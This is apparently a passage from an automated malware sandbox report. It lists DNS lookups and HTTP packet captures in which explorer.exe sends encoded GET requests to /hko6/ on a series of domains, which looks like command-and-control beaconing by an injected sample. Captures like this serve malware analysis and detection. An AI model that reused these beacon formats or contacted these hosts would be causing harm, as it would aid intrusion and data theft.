                                                                                      Nov 26, 2020 08:25:30.890439987 CET53594538.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:25:47.681998014 CET6246853192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:25:47.727782965 CET53624688.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:25:51.190732956 CET5256353192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:25:51.244364023 CET53525638.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:26:13.667608023 CET5472153192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:26:13.707748890 CET53547218.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:26:34.026716948 CET6282653192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:26:34.068280935 CET53628268.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:26:54.596491098 CET6204653192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:26:54.648833990 CET53620468.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:27:14.995831013 CET5122353192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:27:15.050656080 CET53512238.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:27:35.380831003 CET6390853192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:27:35.803332090 CET53639088.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:27:57.994831085 CET4922653192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:27:58.044636965 CET53492268.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:28:09.290771008 CET6021253192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:28:09.334768057 CET53602128.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:28:10.262371063 CET5886753192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:28:10.300389051 CET53588678.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:28:14.740593910 CET5086453192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:28:14.776267052 CET53508648.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:28:18.651273966 CET6150453192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:28:18.846000910 CET53615048.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:28:19.263307095 CET6023153192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:28:19.298738956 CET53602318.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:28:19.528012991 CET5009553192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:28:19.565455914 CET53500958.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:28:39.517646074 CET5965453192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:28:39.557630062 CET53596548.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:28:59.875061035 CET5823353192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:28:59.914695024 CET53582338.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:29:40.602700949 CET5682253192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:29:40.649068117 CET53568228.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:30:01.176217079 CET6257253192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:30:01.252055883 CET53625728.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:30:16.915971994 CET5717953192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:30:16.942970991 CET53571798.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:30:23.442260027 CET5612453192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:30:23.520160913 CET53561248.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:30:52.955491066 CET6228753192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:30:52.982451916 CET53622878.8.8.8192.168.2.7
                                                                                      Nov 26, 2020 08:30:53.299175978 CET5464453192.168.2.78.8.8.8
                                                                                      Nov 26, 2020 08:30:53.334853888 CET53546448.8.8.8192.168.2.7

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                      Nov 26, 2020 08:24:19.406106949 CET192.168.2.78.8.8.80xb884Standard query (0)g.msn.comA (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:24:27.914160967 CET192.168.2.78.8.8.80x112Standard query (0)www.jacmkt.comA (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:24:50.278177977 CET192.168.2.78.8.8.80x7a67Standard query (0)www.goodberryjuice.comA (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:25:10.509020090 CET192.168.2.78.8.8.80x8534Standard query (0)www.azery.siteA (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:25:30.838236094 CET192.168.2.78.8.8.80x6e3aStandard query (0)www.fittcycleacademy.comA (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:25:47.681998014 CET192.168.2.78.8.8.80xf99eStandard query (0)g.msn.comA (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:25:51.190732956 CET192.168.2.78.8.8.80x3797Standard query (0)www.mycapecoralhomevalue.comA (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:26:13.667608023 CET192.168.2.78.8.8.80x578dStandard query (0)www.nextgenmemorabilia.comA (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:26:34.026716948 CET192.168.2.78.8.8.80x58f9Standard query (0)www.bitcoincandy.xyzA (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:26:54.596491098 CET192.168.2.78.8.8.80xfe84Standard query (0)www.nairobi-paris.comA (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:27:14.995831013 CET192.168.2.78.8.8.80x1588Standard query (0)www.multitask-improvements.comA (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:27:35.380831003 CET192.168.2.78.8.8.80x2891Standard query (0)www.best20banks.comA (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:27:57.994831085 CET192.168.2.78.8.8.80xb714Standard query (0)www.affiliateclubindia.comA (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:28:18.651273966 CET192.168.2.78.8.8.80xc3cStandard query (0)www.chartershome.comA (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:28:39.517646074 CET192.168.2.78.8.8.80xd0dcStandard query (0)www.nationshiphop.comA (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:28:59.875061035 CET192.168.2.78.8.8.80xbd43Standard query (0)www.cfmfair.comA (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:29:40.602700949 CET192.168.2.78.8.8.80xbf1cStandard query (0)www.skinnerttc.comA (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:30:01.176217079 CET192.168.2.78.8.8.80x605dStandard query (0)www.jacmkt.comA (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:30:23.442260027 CET192.168.2.78.8.8.80xf5bcStandard query (0)www.goodberryjuice.comA (IP address)IN (0x0001)

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                      Nov 26, 2020 08:24:19.451456070 CET8.8.8.8192.168.2.70xb884No error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                      Nov 26, 2020 08:24:27.993083954 CET8.8.8.8192.168.2.70x112Name error (3)www.jacmkt.comnonenoneA (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:24:50.332254887 CET8.8.8.8192.168.2.70x7a67Name error (3)www.goodberryjuice.comnonenoneA (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:25:10.570861101 CET8.8.8.8192.168.2.70x8534No error (0)www.azery.siteonstatic-fr.setupdns.netCNAME (Canonical name)IN (0x0001)
                                                                                      Nov 26, 2020 08:25:10.570861101 CET8.8.8.8192.168.2.70x8534No error (0)onstatic-fr.setupdns.net81.88.57.68A (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:25:30.890439987 CET8.8.8.8192.168.2.70x6e3aNo error (0)www.fittcycleacademy.comfittcycleacademy.comCNAME (Canonical name)IN (0x0001)
                                                                                      Nov 26, 2020 08:25:30.890439987 CET8.8.8.8192.168.2.70x6e3aNo error (0)fittcycleacademy.com34.102.136.180A (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:25:47.727782965 CET8.8.8.8192.168.2.70xf99eNo error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                      Nov 26, 2020 08:25:51.244364023 CET8.8.8.8192.168.2.70x3797No error (0)www.mycapecoralhomevalue.commycapecoralhomevalue.comCNAME (Canonical name)IN (0x0001)
                                                                                      Nov 26, 2020 08:25:51.244364023 CET8.8.8.8192.168.2.70x3797No error (0)mycapecoralhomevalue.com173.192.101.248A (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:26:13.707748890 CET8.8.8.8192.168.2.70x578dNo error (0)www.nextgenmemorabilia.comnextgenmemorabilia.comCNAME (Canonical name)IN (0x0001)
                                                                                      Nov 26, 2020 08:26:13.707748890 CET8.8.8.8192.168.2.70x578dNo error (0)nextgenmemorabilia.com34.102.136.180A (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:26:34.068280935 CET8.8.8.8192.168.2.70x58f9No error (0)www.bitcoincandy.xyzbitcoincandy.xyzCNAME (Canonical name)IN (0x0001)
                                                                                      Nov 26, 2020 08:26:34.068280935 CET8.8.8.8192.168.2.70x58f9No error (0)bitcoincandy.xyz184.168.131.241A (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:26:54.648833990 CET8.8.8.8192.168.2.70xfe84No error (0)www.nairobi-paris.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                      Nov 26, 2020 08:26:54.648833990 CET8.8.8.8192.168.2.70xfe84No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:27:15.050656080 CET8.8.8.8192.168.2.70x1588No error (0)www.multitask-improvements.commultitask-improvements.comCNAME (Canonical name)IN (0x0001)
                                                                                      Nov 26, 2020 08:27:15.050656080 CET8.8.8.8192.168.2.70x1588No error (0)multitask-improvements.com34.102.136.180A (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:27:35.803332090 CET8.8.8.8192.168.2.70x2891Server failure (2)www.best20banks.comnonenoneA (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:27:58.044636965 CET8.8.8.8192.168.2.70xb714No error (0)www.affiliateclubindia.comaffiliateclubindia.comCNAME (Canonical name)IN (0x0001)
                                                                                      Nov 26, 2020 08:27:58.044636965 CET8.8.8.8192.168.2.70xb714No error (0)affiliateclubindia.com34.102.136.180A (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:28:18.846000910 CET8.8.8.8192.168.2.70xc3cNo error (0)www.chartershome.comchartershome.comCNAME (Canonical name)IN (0x0001)
                                                                                      Nov 26, 2020 08:28:18.846000910 CET8.8.8.8192.168.2.70xc3cNo error (0)chartershome.com192.185.199.129A (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:28:39.557630062 CET8.8.8.8192.168.2.70xd0dcNo error (0)www.nationshiphop.comnationshiphop.comCNAME (Canonical name)IN (0x0001)
                                                                                      Nov 26, 2020 08:28:39.557630062 CET8.8.8.8192.168.2.70xd0dcNo error (0)nationshiphop.com34.102.136.180A (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:28:59.914695024 CET8.8.8.8192.168.2.70xbd43No error (0)www.cfmfair.comcfmfair.comCNAME (Canonical name)IN (0x0001)
                                                                                      Nov 26, 2020 08:28:59.914695024 CET8.8.8.8192.168.2.70xbd43No error (0)cfmfair.com104.164.35.80A (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:29:40.649068117 CET8.8.8.8192.168.2.70xbf1cNo error (0)www.skinnerttc.comskinnerttc.comCNAME (Canonical name)IN (0x0001)
                                                                                      Nov 26, 2020 08:29:40.649068117 CET8.8.8.8192.168.2.70xbf1cNo error (0)skinnerttc.com34.102.136.180A (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:30:01.252055883 CET8.8.8.8192.168.2.70x605dName error (3)www.jacmkt.comnonenoneA (IP address)IN (0x0001)
                                                                                      Nov 26, 2020 08:30:23.520160913 CET8.8.8.8192.168.2.70xf5bcName error (3)www.goodberryjuice.comnonenoneA (IP address)IN (0x0001)

                                                                                      HTTP Request Dependency Graph

                                                                                      • www.azery.site
                                                                                      • www.fittcycleacademy.com
                                                                                      • www.mycapecoralhomevalue.com
                                                                                      • www.nextgenmemorabilia.com
                                                                                      • www.bitcoincandy.xyz
                                                                                      • www.nairobi-paris.com
                                                                                      • www.multitask-improvements.com
                                                                                      • www.affiliateclubindia.com
                                                                                      • www.chartershome.com
                                                                                      • www.nationshiphop.com
                                                                                      • www.cfmfair.com
                                                                                      • www.skinnerttc.com

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.74975381.88.57.6880C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Nov 26, 2020 08:25:10.604625940 CET4442OUTGET /hko6/?3f_X=Q2J8lT4hKB4&rL0=EYQ3CpWwSh2vHAFpwX7bfYNErBh8XjfonzY2Qz/ZEHgGxbW9TOQUf247lcv8UYdItcFHYpJ3ZA== HTTP/1.1
                                                                                      Host: www.azery.site
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Nov 26, 2020 08:25:10.663077116 CET4443INHTTP/1.1 404 Not Found
                                                                                      Date: Thu, 26 Nov 2020 07:25:10 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 6b 6f 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hko6/ was not found on this server.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      1192.168.2.74975634.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Nov 26, 2020 08:25:30.909708023 CET4466OUTGET /hko6/?rL0=7JP9a7+0OyyDCtwY4BBiZHxvOcjmT/EmGsy/Rg5QxlKunDSy+zY41kj2/fIUtC9fXZTQqxticw==&3f_X=Q2J8lT4hKB4 HTTP/1.1
                                                                                      Host: www.fittcycleacademy.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Nov 26, 2020 08:25:31.024852037 CET4466INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Thu, 26 Nov 2020 07:25:30 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "5fb7c734-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      10192.168.2.749771104.164.35.8080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Nov 26, 2020 08:29:00.087791920 CET4624OUTGET /hko6/?rL0=leTXDjYcUtkTOBo/XywC86s6NVsozqkX2a5kzyiD11BblheudN5U1IiLvUCvh9+vkOfDF9tr1A==&3f_X=Q2J8lT4hKB4 HTTP/1.1
                                                                                      Host: www.cfmfair.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Nov 26, 2020 08:29:00.259849072 CET4624INHTTP/1.1 500 Internal Server Error
                                                                                      Content-Type: text/html
                                                                                      Server: Microsoft-IIS/7.5
                                                                                      Date: Thu, 26 Nov 2020 07:28:58 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 57
                                                                                      Data Raw: e6 97 a0 e6 b3 95 e6 98 be e7 a4 ba e9 a1 b5 e9 9d a2 ef bc 8c e5 9b a0 e4 b8 ba e5 8f 91 e7 94 9f e5 86 85 e9 83 a8 e6 9c 8d e5 8a a1 e5 99 a8 e9 94 99 e8 af af e3 80 82
                                                                                      Data Ascii:


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      11192.168.2.74977234.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Nov 26, 2020 08:29:40.670552015 CET4626OUTGET /hko6/?rL0=Z5wXWFR67775H9FWfAIDVOfBSfPNRfbmpsgUF7EF+miwYEgbR5wCg8jOIALgj8zBbklAwevO+Q==&3f_X=Q2J8lT4hKB4 HTTP/1.1
                                                                                      Host: www.skinnerttc.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Nov 26, 2020 08:29:40.785351992 CET4626INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Thu, 26 Nov 2020 07:29:40 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "5fb7c734-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      12192.168.2.74977581.88.57.6880C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Nov 26, 2020 08:30:43.695779085 CET4648OUTGET /hko6/?3f_X=Q2J8lT4hKB4&rL0=EYQ3CpWwSh2vHAFpwX7bfYNErBh8XjfonzY2Qz/ZEHgGxbW9TOQUf247lcv8UYdItcFHYpJ3ZA== HTTP/1.1
                                                                                      Host: www.azery.site
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Nov 26, 2020 08:30:43.745044947 CET4649INHTTP/1.1 404 Not Found
                                                                                      Date: Thu, 26 Nov 2020 07:30:43 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 6b 6f 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hko6/ was not found on this server.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      13192.168.2.74977834.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Nov 26, 2020 08:31:03.921262026 CET4665OUTGET /hko6/?rL0=7JP9a7+0OyyDCtwY4BBiZHxvOcjmT/EmGsy/Rg5QxlKunDSy+zY41kj2/fIUtC9fXZTQqxticw==&3f_X=Q2J8lT4hKB4 HTTP/1.1
                                                                                      Host: www.fittcycleacademy.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Nov 26, 2020 08:31:04.036468029 CET4665INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Thu, 26 Nov 2020 07:31:03 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "5fb7c734-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      14192.168.2.749779173.192.101.24880C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Nov 26, 2020 08:31:24.320868969 CET4666OUTGET /hko6/?3f_X=Q2J8lT4hKB4&rL0=/LbTQbSxfycNpyBkUl28ip4ahz0503SiTQiCvhPHWMRp7RgREL83brTbc+Xp5Y7hhpZ940oONw== HTTP/1.1
                                                                                      Host: www.mycapecoralhomevalue.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Nov 26, 2020 08:31:24.455890894 CET4667INHTTP/1.1 400 Bad Request
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      X-AspNetMvc-Version: 5.2
                                                                                      X-Powered-By: ASP.NET
                                                                                      Date: Thu, 26 Nov 2020 07:31:24 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 296
                                                                                      Data Raw: 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 2f 65 72 72 6f 72 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0a 20 20 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 20 20 3c 70 3e 53 6f 72 72 79 2c 20 62 75 74 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>404 - Page Not Found</title> <link rel="stylesheet" href="/error/error.css" /></head><body> <h1>404</h1> <h2>Page Not Found</h2> <p>Sorry, but the page you are looking for does not exist.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      15192.168.2.74978034.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Nov 26, 2020 08:31:44.627120972 CET4667OUTGET /hko6/?rL0=EcalOYSyHuIWNe0yBiyzQnDoyWnQ8AXmuso6y7H91Y9cmoRSZtclvU9o5GCKwGOmvOmDBOYeyw==&3f_X=Q2J8lT4hKB4 HTTP/1.1
                                                                                      Host: www.nextgenmemorabilia.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Nov 26, 2020 08:31:44.742125988 CET4668INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Thu, 26 Nov 2020 07:31:44 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "5fb7c9ca-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
